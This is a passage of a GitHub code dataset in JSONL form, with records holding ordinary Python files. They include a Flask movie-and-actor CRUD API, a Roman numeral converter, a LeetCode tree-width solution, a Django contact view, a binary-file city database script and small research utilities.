0.250]\r\nquan=[]\r\nfor i in range(len(Items)):\r\n num=randint(1,50)\r\n quan.append(num)\r\n \r\nrev=[]\r\nco=0\r\nfor i in range(len(Items)):\r\n result=prices[i]*quan[i]\r\n rev.append(result)\r\n co+=1\r\n \r\nprint(\"%-12s %-8s %-9s %-6s\" %(\"Item\", \"Price\", \"Quantity\", \"Revenue\"))\r\nprint(\"*\"*40)\r\nfor i in range(len(Items)):\r\n print(\"%-12s %-8.3f %-9d %-6.3f\" %(Items[i],prices[i] ,quan[i] ,rev[i] ))\r\nprint(\"*\"*40) \r\n\r\ntotal=0 \r\nfor element in rev :\r\n total= total+element\r\n\r\nave=total/co\r\n \r\nprint(\"Total revenue= \", total ,\"OMR\")\r\nprint('The average= ', ave) \r\n\r\nfor i in range(len(rev)):\r\n if rev[i]< ave:\r\n print(\"%-12s\"%Items[i], \"\", rev[i])\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"AthirAlAbri/Python","sub_path":"lab10 practice.py","file_name":"lab10 practice.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17271693186","text":"\"Roman Numerals Helper\"\n\n\nclass RomanNumerals(object):\n @classmethod\n def to_roman(cls, num):\n m = {1000: \"M\",\n 900: \"CM\",\n 500: \"D\",\n 400: \"CD\",\n 100: \"C\",\n 90: \"XC\",\n 50: \"L\",\n 40: \"XL\",\n 10: \"X\",\n 9: \"IX\",\n 5: \"V\",\n 4: \"IV\",\n 1: \"I\"}\n if num in m.keys():\n return m[num]\n for i in sorted(m.keys(), reverse=True):\n if num >= i:\n return m[i] + RomanNumerals.to_roman(num - i)\n return \"\"\n\n @classmethod\n def from_roman(cls, s):\n m = {'M': 1000, 'D': 500, 'C': 100, 'L': 50, 'X': 10, 'V': 5, 'I': 1}\n s = s.upper()\n stack = [0]\n # reversed\n for c in s[::-1]:\n if m[c] >= stack[-1]:\n stack.append(m[c])\n else:\n v = stack.pop()\n stack.append(v - m[c])\n return sum(stack)\n\nprint(\nRomanNumerals.to_roman(4), # should return 'M'\nRomanNumerals.from_roman('M') # should return 1000\n)","repo_name":"shubham25namdeo/Leetcode","sub_path":"codewars/Roman Numerals Helper.py","file_name":"Roman Numerals Helper.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"34047891497","text":"\"\"\"Tabular representation\"\"\"\n\nfrom rlpy.Representations.Representation import Representation\nimport numpy as np\nfrom copy import deepcopy\n\n__copyright__ = \"Copyright 2013, RLPy http://acl.mit.edu/RLPy\"\n__credits__ = [\"Alborz Geramifard\", \"Robert H. Klein\", \"Christoph Dann\",\n \"William Dabney\", \"Jonathan P. How\"]\n__license__ = \"BSD 3-Clause\"\n__author__ = \"Imanol Arrieta Ibarra\"\n\n\nclass TabularPosterior(Representation):\n \"\"\"\n Tabular representation that assigns a binary feature function f_{d}() \n to each possible discrete state *d* in the domain. (For bounded continuous\n dimensions of s, discretize.)\n f_{d}(s) = 1 when d=s, 0 elsewhere. (ie, the vector of feature functions\n evaluated at *s* will have all zero elements except one).\n NOTE that this representation does not support unbounded dimensions\n \n Additionally, this representation has two types of weights. \n\n \"\"\"\n observed = None\n observed_rewards = None\n observed_transitions = None\n\n def __init__(self, domain, discretization=20):\n # Already performed in call to superclass\n self.setBinsPerDimension(domain, discretization)\n self.features_num = int(np.prod(self.bins_per_dim))\n super(TabularPosterior, self).__init__(domain, discretization)\n self.observed_rewards = {}\n self.observed = np.zeros((self.features_num,self.actions_num))\n self.observed_transitions = np.zeros((self.features_num,self.actions_num,self.agg_states_num))\n\n def phi_nonTerminal(self, s):\n hashVal = self.hashState(s)\n F_s = np.zeros(self.agg_states_num, bool)\n F_s[hashVal] = 1\n return F_s\n\n def featureType(self):\n return bool\n \n def location(self,s,a,ns):\n hashVal =self.hashState(s)\n hashVal_prime = self.hashState(ns)\n i,j = hashVal, hashVal_prime\n return i,j\n \n","repo_name":"imanolarrieta/angrybirds","sub_path":"RL/Final Project/Tests/TabularPosterior.py","file_name":"TabularPosterior.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"78"} +{"seq_id":"9137044346","text":"import os\n\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_cors import CORS, cross_origin\n\nfrom config import TestConfig, Config\nfrom models import setup_db, Movies, Actors, Category, MoviesCategories, MoviesActors, Agents\nfrom auth import requires_auth\n\ndb = SQLAlchemy()\ncors = CORS()\nmigrate = Migrate()\n\n\ndef paginate(request, selection):\n \"\"\"\n Function that handles pagination\n :param request: request passed used to get the current page\n :param selection: the object from the database to paginate\n :return: the paginated object, containing a list with the formatted objects\n \"\"\"\n page = request.args.get('page', 1, type=int)\n start = (page - 1) * Config.PAGINATION\n end = start + Config.PAGINATION\n\n obj_list = [obj.format() for obj in selection]\n pagination = obj_list[start:end]\n\n return pagination\n\n\ndef create_app(config_file=Config):\n \"\"\"\n Used to create the flask app\n :param config_file: a config file, which you can setup in the config.py file - defaults to Config\n :return: returns the flask app\n \"\"\"\n app = Flask(__name__)\n\n app.config.from_object(config_file)\n\n db.init_app(app=app)\n # cors.init_app(app, resources={r\"*\": {\"origins\": \"*\"}})\n cors.init_app(app)\n migrate.init_app(app=app, db=db)\n\n with app.app_context():\n setup_db(app)\n\n # Just do CORS stuff here before request\n # @app.after_request\n # def after_request(response):\n # \"\"\"\n # Function that handles CORS\n # :param response: response header\n # :return: returns the response with CORS headers\n # \"\"\"\n # response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization,true')\n # response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n # response.headers.add('Access-Control-Allow-Credentials', 'true')\n #\n # return response\n\n @app.route('/')\n def index():\n return \"

Capstone API

\"\n\n @app.route('/movies', methods=['GET'])\n @cross_origin()\n @requires_auth('get:movies')\n def get_movies(payload):\n \"\"\"\n Get the Movies here and paginate them\n :param payload:\n :return: a json object containing the paginated movies and the total movies\n \"\"\"\n movies = Movies.query.order_by(Movies.id).all()\n\n if len(movies) == 0:\n abort(404, 'Sorry, we could not find any Movies to display.')\n\n return jsonify({\n 'movies': paginate(request, movies),\n 'total_movies': len(movies)\n })\n\n @app.route('/agents', methods=['GET'])\n @cross_origin()\n @requires_auth('get:agents')\n def get_agents(payload):\n \"\"\"\n GET method to fetch all the agents from the database\n :return: json object containing the paginated agents, and total of agents\n \"\"\"\n agents = Agents.query.order_by(Agents.id).all()\n\n if len(agents) == 0:\n abort(404, 'Sorry, we could not find any Agents.')\n\n return jsonify({\n 'agents': paginate(request, agents),\n 'total_agents': len(agents)\n })\n\n @app.route('/categories', methods=['GET'])\n @cross_origin()\n @requires_auth('get:categories')\n def get_categories(payload):\n \"\"\"\n GET method to fetch the categories and paginate them\n :return: json object containing all categories and total categories\n \"\"\"\n categories = Category.query.order_by(Category.id).all()\n\n if len(categories) == 0:\n abort(404, 'Sorry, we could not find any Categories.')\n\n return jsonify({\n 'categories': paginate(request, categories),\n 'total_categories': len(categories)\n })\n\n @app.route('/actors', methods=['GET'])\n @cross_origin()\n @requires_auth('get:actors')\n def get_actors(payload):\n \"\"\"\n GET method to fetch all the actors\n :return: json object containing the paginated actors and total of actors\n \"\"\"\n actors = Actors.query.order_by(Actors.id).all()\n\n if len(actors) == 0:\n abort(404, 'Sorry, we could not find any Agents to display.')\n\n return jsonify({\n 'actors': paginate(request, actors),\n 'total_actors': len(actors)\n })\n\n @app.route('/agent/', methods=['GET'])\n @cross_origin()\n @requires_auth('patch:agents')\n def get_agent(payload, agent_id):\n \"\"\"\n GET method to fetch the agent based on agent_id passed\n :param agent_id: the id of the current agent to fetch from the database\n :return: json object containing the agent in a proper format\n \"\"\"\n agent = Agents.query.filter_by(id=agent_id).first_or_404()\n\n if agent is None:\n abort(404, 'Sorry, we could not find any Agents to display.')\n\n return jsonify({\n 'agent': agent.format(),\n })\n\n @app.route('/actor/', methods=['GET'])\n @cross_origin()\n @requires_auth('patch:actors')\n def get_actor(payload, actor_id):\n \"\"\"\n GET method to fetch the actor based on actor_id passed\n :param actor_id: the id of the current actor to fetch from the database\n :return: json object containing the actor in a proper format\n \"\"\"\n actor = Actors.query.filter_by(id=actor_id).first_or_404()\n\n if actor is None:\n abort(404, 'Sorry, we could not find any Agents to display.')\n\n return jsonify({\n 'actor': actor.format(),\n })\n\n @app.route('/movie/', methods=['GET'])\n @cross_origin()\n @requires_auth('patch:movies')\n def get_movie(payload, movie_id):\n \"\"\"\n GET method to fetch the movie based on movie_id passed\n :param movie_id: the id of the current movie to fetch from the database\n :return: json object containing the movie in a proper format\n \"\"\"\n movie = Movies.query.filter_by(id=movie_id).first_or_404()\n\n if movie is None:\n abort(404, 'Sorry, we could not find any Movies to display.')\n\n return jsonify({\n 'movie': movie.format(),\n })\n\n @app.route('/category/', methods=['GET'])\n @cross_origin()\n @requires_auth('patch:categories')\n def get_category(payload, category_id):\n \"\"\"\n GET method to fetch the category based on category_id passed\n :param category_id: the id of the current category to fetch from the database\n :return: json object containing the category\n \"\"\"\n category = Category.query.filter_by(id=category_id).first_or_404()\n\n if category is None:\n abort(404, 'Sorry, we could not find any Categories to display.')\n\n return jsonify({\n 'category': category.format(),\n })\n\n @app.route('/actor', methods=['POST'])\n @cross_origin()\n @requires_auth('post:actors')\n def new_actor(payload):\n \"\"\"\n Add an Actor here\n :param payload:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n\n if Actors.query.filter_by(name=form['name']).first() is not None:\n abort(500, \"Actor '{}' already exists...\".format(\n form['name']\n ))\n\n try:\n new_actor = Actors(\n name=form['name'],\n gender=form['gender'],\n age=form['age'],\n joined_in=form['joined_in'],\n agent_id=form['agent_id']\n )\n new_actor.insert()\n except Exception as e:\n print(e)\n abort(500, e)\n\n return jsonify({\n 'actor': [new_actor.format()]\n })\n\n @app.route('/agent', methods=['POST'])\n @cross_origin()\n @requires_auth('post:agents')\n def new_agent(payload):\n \"\"\"\n Add an Agent here\n :param payload:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n\n if Agents.query.filter_by(name=form['name']).first() is not None:\n abort(500, \"Agent '{}' already exists...\".format(\n form['name']\n ))\n\n try:\n new_agent = Agents(\n name=form['name'],\n joined_in=form['joined_in']\n )\n new_agent.insert()\n except Exception as e:\n abort(500, e)\n\n return jsonify({\n 'actor': [new_agent.format()]\n })\n\n @app.route('/category', methods=['POST'])\n @cross_origin()\n @requires_auth('post:categories')\n def new_category(payload):\n \"\"\"\n Add a Category here\n :param payload:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n\n if Category.query.filter_by(name=form['name']).first() is not None:\n abort(500, 'Category {} already exists...'.format(\n form['name']\n ))\n\n try:\n new_category = Category(\n name=form['name']\n )\n new_category.insert()\n except Exception as e:\n abort(500, e)\n\n return jsonify({\n 'category': [new_category.format()]\n })\n\n @app.route('/movie', methods=['POST'])\n @cross_origin()\n @requires_auth('post:movies')\n def new_movie(payload):\n \"\"\"\n Add a Movie here\n :param payload:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n\n if Movies.query.filter_by(title=form['title']).first() is not None:\n abort(500, \"Movie '{}' already exists...\".format(\n form['title']\n ))\n\n try:\n new_movie = Movies(\n title=form['title'],\n release_date=form['release_date'],\n rating=form['rating']\n )\n\n categories = [Category.query.filter_by(name=category).first() for category in form['categories']]\n actors = [Actors.query.filter_by(name=actor).first() for actor in form['actors']]\n new_movie.categories = categories\n new_movie.actors = actors\n\n # As I am not sure how to use 'uselist', this will suffice:\n # for category in categories:\n # new_movie.categories.append(category)\n # for actor in actors:\n # new_movie.actors.append(actor)\n\n new_movie.insert()\n except Exception as e:\n abort(500, e)\n\n return jsonify({\n 'movie': [new_movie.format()]\n })\n\n @app.route('/update/actor/', methods=['PATCH'])\n @cross_origin()\n @requires_auth('patch:actors')\n def update_actor(payload, actor_id):\n \"\"\"\n Update an Actor here\n :param payload:\n :param actor_id:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n current_actor = Actors.query.filter_by(id=actor_id).first_or_404()\n\n if current_actor is None:\n abort(500, \"Agent not found\")\n\n try:\n current_actor.name = form['name']\n current_actor.gender = form['gender']\n current_actor.age = form['age']\n current_actor.joined_in = form['joined_in']\n current_actor.agent_id = form['agent_id']\n current_actor.update()\n except Exception as e:\n db.session.rollback()\n abort(500, e)\n\n return jsonify({\n 'actor': [current_actor.format()]\n })\n\n @app.route('/update/agent/', methods=['PATCH'])\n @cross_origin()\n @requires_auth('patch:agents')\n def update_agent(payload, agent_id):\n \"\"\"\n Update an Agent here\n :param payload:\n :param agent_id:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n current_agent = Agents.query.filter_by(id=agent_id).first_or_404()\n\n if current_agent is None:\n abort(500, \"Agent not found\")\n\n try:\n current_agent.name = form['name']\n current_agent.joined_in = form['joined_in']\n current_agent.update()\n except Exception as e:\n db.session.rollback()\n abort(500, e)\n\n return jsonify({\n 'agent': [current_agent.format()]\n })\n\n @app.route('/update/category/', methods=['PATCH'])\n @cross_origin()\n @requires_auth('patch:categories')\n def update_category(payload, category_id):\n \"\"\"\n Update a Category here\n :param payload:\n :param category_id:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n current_category = Category.query.filter_by(id=category_id).first_or_404()\n\n if current_category is None:\n abort(500, \"Category not found\")\n\n try:\n current_category.name = form['name']\n current_category.update()\n except Exception as e:\n db.session.rollback()\n abort(500, e)\n\n return jsonify({\n 'category': [current_category.format()]\n })\n\n @app.route('/update/movie/', methods=['PATCH'])\n @cross_origin()\n @requires_auth('patch:movies')\n def update_movie(payload, movie_id):\n \"\"\"\n Update a Movie here\n :param payload:\n :param movie_id:\n :return:\n \"\"\"\n form = request.get_json(force=True)\n current_movie = Movies.query.filter_by(id=movie_id).first_or_404()\n\n if current_movie is None:\n abort(500, \"Category not found\")\n\n try:\n current_movie.title = form['title']\n current_movie.release_date = form['release_date']\n current_movie.rating = form['rating']\n\n # must delete the many to many items.\n categories_delete = MoviesCategories.query.filter_by(movie_id=movie_id)\n categories_delete.delete()\n\n actors_delete = MoviesActors.query.filter_by(movie_id=movie_id)\n actors_delete.delete()\n\n categories = [Category.query.filter_by(name=category).first() for category in form['categories']]\n actors = [Actors.query.filter_by(name=actor).first() for actor in form['actors']]\n\n # As I am not sure how to use 'uselist', this will suffice:\n for category in categories:\n current_movie.categories.append(category)\n\n for actor in actors:\n current_movie.actors.append(actor)\n\n current_movie.update()\n except Exception as e:\n db.session.rollback()\n abort(500, e)\n\n return jsonify({\n 'movie': [current_movie.format()]\n })\n\n @app.route('/actor/', methods=['DELETE'])\n @cross_origin()\n @requires_auth('delete:actors')\n def remove_actor(payload, actor_id):\n \"\"\"\n Delete an Actor here\n :param payload:\n :param actor_id:\n :return:\n \"\"\"\n try:\n current_actor = Actors.query.filter_by(id=actor_id).first_or_404()\n deleted = current_actor.format()\n\n if current_actor is None:\n abort(404)\n\n current_actor.delete()\n all_actors = Actors.query.order_by(Actors.id).all()\n current_actors = paginate(request, all_actors)\n\n return jsonify({\n 'deleted': deleted,\n 'actors': current_actors,\n 'total_actors': len(all_actors)\n })\n\n except Exception as e:\n abort(422, e)\n\n @app.route('/agent/', methods=['DELETE'])\n @cross_origin()\n @requires_auth('delete:agents')\n def remove_agent(payload, agent_id):\n \"\"\"\n Delete an Agent here\n :param payload:\n :param agent_id:\n :return:\n \"\"\"\n try:\n current_agent = Agents.query.filter_by(id=agent_id).first_or_404()\n deleted = current_agent.format()\n\n if current_agent is None:\n abort(404)\n\n current_agent.delete()\n all_agents = Agents.query.order_by(Agents.id).all()\n current_agents = paginate(request, all_agents)\n\n return jsonify({\n 'deleted': deleted,\n 'agents': current_agents,\n 'total_agents': len(all_agents)\n })\n\n except Exception as e:\n abort(422, e)\n\n @app.route('/category/', methods=['DELETE'])\n @cross_origin()\n @requires_auth('delete:categories')\n def remove_category(payload, category_id):\n \"\"\"\n Delete a Category here\n :param payload:\n :param category_id:\n :return:\n \"\"\"\n try:\n current_category = Category.query.filter_by(id=category_id).first_or_404()\n deleted = current_category.format()\n\n if current_category is None:\n abort(404)\n\n current_category.delete()\n all_categories = Category.query.order_by(Category.id).all()\n current_categories = paginate(request, all_categories)\n\n return jsonify({\n 'deleted': deleted,\n 'categories': current_categories,\n 'total_categories': len(all_categories)\n })\n\n except Exception as e:\n abort(422, e)\n\n @app.route('/movie/', methods=['DELETE'])\n @cross_origin()\n @requires_auth('delete:movies')\n def remove_movie(payload, movie_id):\n \"\"\"\n Delete a Movie here\n :param payload:\n :param movie_id:\n :return:\n \"\"\"\n try:\n current_movie = Movies.query.filter_by(id=movie_id).first_or_404()\n deleted = current_movie.format()\n\n if current_movie is None:\n abort(404)\n\n current_movie.delete()\n all_movies = Movies.query.order_by(Movies.id).all()\n current_movies = paginate(request, all_movies)\n\n return jsonify({\n 'deleted': deleted,\n 'movies': current_movies,\n 'total_movies': len(all_movies)\n })\n\n except Exception as e:\n abort(422, e)\n\n '''\n Error Handlers go here\n '''\n\n @app.errorhandler(400)\n def bad_reques(error):\n return jsonify({\n 'message': error.description,\n 'error': 400,\n 'success': False\n }), 400\n\n @app.errorhandler(401)\n def not_found(error):\n return jsonify({\n 'message': error.description,\n 'error': 401,\n 'success': False\n }), 401\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n 'message': error.description,\n 'error': 404,\n 'success': False\n }), 404\n\n @app.errorhandler(405)\n def not_allowed(error):\n return jsonify({\n 'message': error.description,\n 'error': 405,\n 'success': False\n }), 405\n\n @app.errorhandler(422)\n def unprocessable_entity(error):\n return jsonify({\n 'message': error.description,\n 'error': 422,\n 'success': False\n }), 422\n\n @app.errorhandler(500)\n def internal_error(error):\n return jsonify({\n 'message': error.description,\n 'error': 500,\n 'success': False\n }), 500\n\n return app\n\n\napp = create_app()\nport = int(os.environ.get(\"PORT\", 8080))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=port)\n","repo_name":"dafer660/Capstone","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":19705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17301705378","text":"# Given a binary tree, write a function to get the maximum width of the given tree. The maximum width of a tree is the maximum width among all levels.\n\n# The width of one level is defined as the length between the end-nodes (the leftmost and right most non-null nodes in the level, where the null nodes between the end-nodes are also counted into the length calculation.\n\n# It is guaranteed that the answer will in the range of 32-bit signed integer.\n\n# Example 1:\n\n# Input: \n\n# 1\n# / \\\n# 3 2\n# / \\ \\ \n# 5 3 9 \n\n# Output: 4\n# Explanation: The maximum width existing in the third level with the length 4 (5,3,null,9).\n# Example 2:\n\n# Input: \n\n# 1\n# / \n# 3 \n# / \\ \n# 5 3 \n\n# Output: 2\n# Explanation: The maximum width existing in the third level with the length 2 (5,3).\n# Example 3:\n\n# Input: \n\n# 1\n# / \\\n# 3 2 \n# / \n# 5 \n\n# Output: 2\n# Explanation: The maximum width existing in the second level with the length 2 (3,2).\n# Example 4:\n\n# Input: \n\n# 1\n# / \\\n# 3 2\n# / \\ \n# 5 9 \n# / \\\n# 6 7\n# Output: 8\n# Explanation:The maximum width existing in the fourth level with the length 8 (6,null,null,null,null,null,null,7).\n\nclass Solution:\n def widthOfBinaryTree(self, root: TreeNode) -> int:\n #use pre order traversal to iterate through tree\n #make queue of nodes, keeping track of their level and position\n #at the end of each level, subtract lowest position from highest position to get width \n print(root)\n if root.left == None and root.right == None:\n return 1\n \n currentLevel = 2\n lowest = 0\n highest = 0\n maxWidth = 0\n queue = []\n if root.left is not None:\n queue.append([2,1,root.left])\n \n if root.right is not None:\n queue.append([2,2,root.right])\n \n \n while len(queue) > 0:\n newNode = queue.pop(0)\n if newNode[0] != currentLevel:\n maxWidth = max(highest - lowest + 1, maxWidth)\n currentLevel += 1\n lowest = 0\n highest = 0\n \n if newNode[1] < lowest or lowest == 0:\n lowest = newNode[1]\n \n if newNode[1] > highest or highest == 0:\n highest = newNode[1]\n \n newLevel = currentLevel + 1\n \n if newNode[2].left != None:\n queue.append([newLevel,newNode[1]*2 - 1 , newNode[2].left])\n \n if newNode[2].right != None:\n queue.append([newLevel,newNode[1]*2 , newNode[2].right])\n \n maxWidth = max(highest - lowest + 1, maxWidth)\n \n return maxWidth","repo_name":"FelixAlvarado/notes","sub_path":"january 2021/maxWidthTree.py","file_name":"maxWidthTree.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40941600228","text":"from django.views.generic.edit import CreateView\nfrom django.contrib import messages\nfrom django.dispatch import Signal\n\nfrom .models import Contact\n\n\nclass ContactCreate(CreateView):\n model = Contact\n template_name = \"contact/contact_new.html\"\n fields = (\n \"first_name\",\n \"last_name\",\n \"phone\",\n \"email\",\n \"message\",\n )\n\n def get_initial(self):\n initial = super(ContactCreate, self).get_initial()\n if self.request.user.is_authenticated:\n initial[\"email\"] = self.request.user.email\n return initial\n\n def post(self, request, *args, **kwargs):\n form = self.get_form()\n if form.is_valid():\n create_contact.send(sender=self.__class__, request=request)\n messages.success(request, \"Сообщение успешно отправлено\")\n return self.form_valid(form)\n else:\n create_contact_failed.send(sender=self.__class__, request=request)\n messages.error(request, \"Ошибка при отправке сообщения\")\n return self.form_invalid(form)\n\n\ncreate_contact = Signal(providing_args=[\"request\"])\ncreate_contact_failed = Signal(providing_args=[\"request\"])\n","repo_name":"lsujh/cryptocurrency","sub_path":"contact/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22222124344","text":"from flask import request, jsonify\n\nfrom sets import SERVER, CLIENT\nfrom app import app, sio\nfrom api import API, Error\n\n\n@app.route('/', methods=['POST'])\ndef index():\n\tx = request.json\n\t# print(x)\n\n\t# All required fields are not specified\n\n\tfor field in ('method', 'token'): # 'params', 'language'\n\t\tif field not in x:\n\t\t\treturn jsonify({'error': 2, 'result': 'All required fields are not specified!'})\n\n\t#\n\n\tapi = API(\n\t\tserver=SERVER,\n\t\tclient=CLIENT,\n\t\tsocketio=sio,\n\t\tip=request.remote_addr,\n\t\ttoken=x['token'] if 'token' in x else None,\n\t\tlanguage=x['language'] if 'language' in x else 'en',\n\t\tip_remote=x['ip'] if 'ip' in x else None,\n\t)\n\n\treq = {}\n\n\ttry:\n\t\tres = api.method(x['method'], x['params'] if 'params' in x else {})\n\n\texcept Error.BaseError as e:\n\t\treq['error'] = e.code\n\t\treq['result'] = str(e)\n\n\t# except Exception as e:\n\t# \treq['error'] = 1\n\t# \treq['result'] = 'Server error'\n\n\telse:\n\t\treq['error'] = 0\n\n\t\tif res:\n\t\t\treq['result'] = res\n\n\treturn jsonify(req)","repo_name":"kosyachniy/spbu","sub_path":"grid_and_cloud/project/api/app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"25922743988","text":"import os\r\nmaxi= 20\r\ncityFile = open('city.bin',\"wb+\")\r\nn=int(input(\"How manu Entries: \"))\r\nfor loop in range(n):\r\n city=input(\"Enter\"+ str(loop+1)+\"City name:\")\r\n if(len(city)<20):\r\n city=city+(maxi-len(city)) * ' '\r\n city=city.encode()\r\n cityFile.write(city)\r\ncityFile.seek(0)\r\nsize=os.path.getsize(\"city.bin\")\r\nn=int(size/maxi)\r\n\r\nwhile(True):\r\n pos=0\r\n cityFile.seek(0)\r\n print(\"1. display all Recods \")\r\n print(\"2. serach City\")\r\n print(\"3. Insert City\")\r\n print(\"4. Delete City\")\r\n print(\"5. Update City\")\r\n print(\"6. Exit\")\r\n ch=int(input(\"Enter your choise=>\"))\r\n if(ch==1):\r\n for loop in range(n):\r\n data=cityFile.read(maxi)\r\n print(data.decode())\r\n pos+=maxi\r\n cityFile.seek(pos)\r\n elif(ch==2):\r\n pos=0\r\n found=False\r\n searchCity=input(\"Enter City name which you Want to search=>\")\r\n for loop in range(maxi):\r\n name=cityFile.read(maxi)\r\n name=name.decode()\r\n if name.rstrip().upper() == searchCity.upper():\r\n found = True\r\n print(name.rstrip(),\"Found on\",(loop+1),\"Position\")\r\n break\r\n pos+=maxi\r\n cityFile.seek(pos)\r\n if found == False:\r\n print(searchCity,\"not Found\")\r\n elif(ch==3):\r\n found = False\r\n name=input(\"Enter new city name=>\")\r\n cityFile.seek(0,2)\r\n if(len(name)<20):\r\n name=name+(maxi-len(name)) * ' '\r\n name=name.encode()\r\n cityFile.write(name)\r\n n+=1\r\n found=True\r\n print(\"No of Records:\",n)\r\n if found==True:\r\n print(\"Record/s insert Successfully\")\r\n else:\r\n print(\"Record/s Not inserted\")\r\n elif(ch==4):\r\n found = False\r\n cityFile.seek(0)\r\n deleteCity=input(\"which city do you want yo delete?=>\")\r\n file2=open(\"newfile.bin\",\"wb\")\r\n for loop in range(n):\r\n name=cityFile.read(maxi)\r\n name=name.decode()\r\n if name.rstrip().upper() != deleteCity.upper():\r\n file2.write(name.encode())\r\n found=True\r\n pos+=maxi\r\n cityFile.seek(pos)\r\n cityFile.close()\r\n file2.close()\r\n os.remove(\"city.bin\")\r\n os.rename(\"newfile.bin\",\"city.bin\")\r\n cityFile=open(\"city.bin\",\"rb+\")\r\n size=os.path.getsize(\"city.bin\")\r\n n=int(size/maxi)\r\n if found==True:\r\n print(\"Record/s delete Successfully\")\r\n else:\r\n print(\"Record/s Not deleted\")\r\n elif(ch==5):\r\n found = False\r\n pos=0\r\n oldName=input(\"Enter old City name=>\")\r\n newName=input(\"Enter new City name=>\")\r\n if(len(newName)<20):\r\n newName=newName+(maxi-len(newName)) * ' '\r\n if(len(oldName)<20):\r\n oldName=oldName+(maxi-len(oldName)) * ' '\r\n for loop in range(n):\r\n cityFile.seek(pos)\r\n name=cityFile.read(maxi)\r\n name=name.decode()\r\n if oldName.upper()==name.upper():\r\n found=True\r\n cityFile.seek(-20,1)\r\n cityFile.write(newName.encode())\r\n pos+=maxi\r\n if found==True:\r\n print(\"Record/s Update Successfully=>\")\r\n else:\r\n print(\"No records founds\")\r\n elif(ch==6):\r\n break\r\ncityFile.close()\r\n","repo_name":"yashdesai01/python","sub_path":"Binary_file/CRUD.py","file_name":"CRUD.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"3896173862","text":"from r2base.engine.indexer import Indexer\nfrom r2base.engine.ranker import Ranker\nimport json\nimport numpy as np\nimport time\n\n\ndef wiki2doc(l):\n temp = json.loads(l)\n docs = [{'title': temp[0],\n 'text': temp[1][0:1000],\n 'seed': np.random.randint(0, 1000)}]\n return docs\n\n\nif __name__ == \"__main__\":\n path = \"data/tiny_zh_wiki.jsonl\"\n indexer = Indexer()\n ranker = Ranker()\n\n mapping = {\n 'title': {'type': 'keyword'},\n 'text': {'type': 'text',\n 'lang': 'zh',\n 'index': 'bm25'\n },\n 'seed': {'type': 'object'},\n '_meta': {\"type\": \"meta\",\n \"value\": {\"ok\": {\"encoder_id\": \"okok\",\n \"score\": \"123\"}}}\n }\n docs = []\n chunk_size = 10\n index = 'wiki-zh'\n indexer.delete_index(index)\n time.sleep(2)\n indexer.create_index(index, mapping)\n cnt = 0\n with open(path, 'r', encoding='utf8') as f:\n buffer = []\n for l in f:\n cnt += 1\n buffer.extend(wiki2doc(l))\n if len(buffer) % chunk_size == 0:\n indexer.add_docs(index, buffer, chunk_size, show_progress=True)\n buffer = []\n\n print(\"DONE\")\n print(ranker.query(index, {'match': {'text': \"数学\"}}))\n","repo_name":"ariafyy/R2Base","sub_path":"example/cjk_example.py","file_name":"cjk_example.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"17678569254","text":"# -*- coding: utf-8 -*-\n\"\"\"Helper to build bench model for models that operate on pre-computed feature frames.\"\"\"\n\nfrom typing import Collection, Optional\n\nfrom loguru import logger\n\n__all__ = [\"DFModel\"]\n\n\nclass DFModel:\n def __init__(self, model, features: Optional[Collection[str]] = None):\n \"\"\"Initialize the model.\n\n .. note:::\n\n If you use the model, you must set\n :code:`patch_in_ds` in the\n :code:py:`~mofdscribe.bench.mofbench.MOFBench` class.\n\n Args:\n model (object): Must implement `fit` and `predict` methods.\n Using a sklearn function signature will work.\n features (Collection[str], optional): Feature names to use.\n If not provided, all features will be used.\n Defaults to None.\n \"\"\"\n self._model = model\n self._features = features\n\n @property\n def features(self):\n if self._features is None:\n self._features = list(self.ds.available_features)\n return self._features\n\n def fit(self, idx, structures, y):\n logger.debug(\"Fitting model\")\n X = self.ds._df[self.features].loc[idx, :] # noqa: N806\n logger.debug(X.shape)\n self._model.fit(X, y) # noqa: N806\n\n def predict(self, idx, structures):\n X = self.ds._df[self.features].loc[idx, :] # noqa: N806\n return self._model.predict(X) # noqa: N806\n","repo_name":"kjappelbaum/mofdscribe","sub_path":"src/mofdscribe/bench/df_model.py","file_name":"df_model.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"79"} +{"seq_id":"37142432784","text":"from app.models import db, environment, SCHEMA, Group\n\n\ndef 